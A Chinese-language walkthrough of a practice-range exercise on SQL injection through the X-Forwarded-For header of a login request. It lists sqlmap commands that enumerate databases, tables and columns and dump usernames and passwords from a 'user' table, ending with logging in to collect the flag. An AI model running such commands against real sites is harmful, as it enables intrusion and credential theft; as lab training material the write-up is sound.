墨者靶场-X-Forwarded-For注入漏洞实战

                                                                                墨者学习01

                                                                               By/shy014

1.在网站登陆处抓包,发现提示IP已被记录。

墨者靶场-X-Forwarded-For注入漏洞实战

2.添加X-Forwarded-For字段,随意给予IP,发现被记录的IP发生了更改,说明X-Forwarded-For字段的内容可控,且很有可能保存在数据库当中

墨者靶场-X-Forwarded-For注入漏洞实战

3.将数据包保存为TXT文件,并将X-Forwarded-For字段内容置为*,提示sqlmap该处存在sql注入漏洞。

python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt

墨者靶场-X-Forwarded-For注入漏洞实战

4.读取数据库:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt --dbs -v 3

墨者靶场-X-Forwarded-For注入漏洞实战

5.获得表名:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar --tables

墨者靶场-X-Forwarded-For注入漏洞实战

6.获得字段:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user –columns

墨者靶场-X-Forwarded-For注入漏洞实战

7.获得内容:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user -C"id ,password,username" –dump

墨者靶场-X-Forwarded-For注入漏洞实战

8.登陆网站,获得key

墨者靶场-X-Forwarded-For注入漏洞实战